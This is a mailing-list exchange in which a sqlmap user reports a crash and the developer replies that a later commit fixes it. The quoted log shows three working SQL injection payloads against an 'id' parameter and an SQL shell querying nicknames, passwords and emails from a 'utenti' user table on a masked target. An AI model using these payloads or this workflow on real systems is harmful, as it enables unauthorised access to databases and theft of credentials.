Hi Marco.

Thank you for your report; you will find it fixed with the latest r4969 commit.

Kind regards,
Miroslav Stampar

On Wed, Apr 4, 2012 at 10:19 PM, Marco Mirandola <mmmc...@gmail.com> wrote:

> [22:15:51] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
> [22:15:51] [INFO] testing connection to the target url
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Place: GET
> Parameter: id
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: id=12' AND 7690=7690 AND 'coUR'='coUR
>
>     Type: UNION query
>     Title: MySQL UNION query (NULL) - 2 columns
>     Payload: id=12' UNION ALL SELECT NULL, CONCAT(0x3a6e617a3a,0x61476a577a7053536676,0x3a6f61623a)# AND 'vhgF'='vhgF
>
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 AND time-based blind
>     Payload: id=12' AND SLEEP(5) AND 'oxZQ'='oxZQ
> ---
>
> [22:15:51] [INFO] the back-end DBMS is MySQL
>
> web application technology: Apache
> back-end DBMS: MySQL 5.0.11
> [22:15:51] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
> sql-shell> select nick, pws from utenti
> [22:15:56] [INFO] fetching SQL SELECT statement query output: 'select nick, pws from utenti'
> select nick, pws from utenti:    'None'
>
> sql-shell> select nick, pws from utenti
> [22:16:08] [INFO] fetching SQL SELECT statement query output: 'select nick, pws from utenti'
> select nick, pws from utenti:    'None'
>
> sql-shell> select nick, pws, mail from utenti
> [22:16:32] [INFO] fetching SQL SELECT statement query output: 'select nick, pws, mail from utenti'
> [22:16:32] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
> [22:16:32] [INFO] resumed: 4
> the SQL query provided can return 4 entries. How many entries do you want to retrieve?
> [a] All (default)
> [#] Specific number
> [q] Quit
> > a
>
> [22:16:36] [INFO] retrieving the length of query output
>
> [22:16:36] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sqlmap-users@lists.sourceforge.net the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev
> Python version: 2.7.2
> Operating system: nt
> Command line: P:\SQl INJECTION\sqlmap\sqlmap.py -u **************************************************** --sql-shell --threads=5
> Technique: BOOLEAN
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "P:\SQl INJECTION\sqlmap\_sqlmap.py", line 82, in main
>     start()
>   File "P:\SQl INJECTION\sqlmap\lib\controller\controller.py", line 573, in start
>     action()
>   File "P:\SQl INJECTION\sqlmap\lib\controller\action.py", line 121, in action
>     conf.dbmsHandler.sqlShell()
>   File "P:\SQl INJECTION\sqlmap\plugins\generic\enumeration.py", line 2451, in sqlShell
>     output = self.sqlQuery(query)
>   File "P:\SQl INJECTION\sqlmap\plugins\generic\enumeration.py", line 2397, in sqlQuery
>     output = inject.getValue(query, fromUser=True)
>   File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 439, in getValue
>     value = __goInferenceProxy(query, fromUser, expected, batch, unpack, charsetType, firstChar, lastChar, dump)
>   File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 306, in __goInferenceProxy
>     output = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected, num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)
>   File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 115, in __goInferenceFields
>     output = __goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump)
>   File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 70, in __goInference
>     _, length, _ = queryOutputLength(expression, payload)
>   File "P:\SQl INJECTION\sqlmap\lib\utils\resume.py", line 74, in queryOutputLength
>     count, length = bisection(payload, lengthExprUnescaped, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
> TypeError: bisection() got an unexpected keyword argument 'expected'
>
> [*] shutting down at 22:16:36
>
>
> ------------------------------------------------------------------------------
> Better than sec? Nothing is better than sec when it comes to
> monitoring Big Data applications. Try Boundary one-second
> resolution app monitoring today. Free.
> http://p.sf.net/sfu/Boundary-dev2dev
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm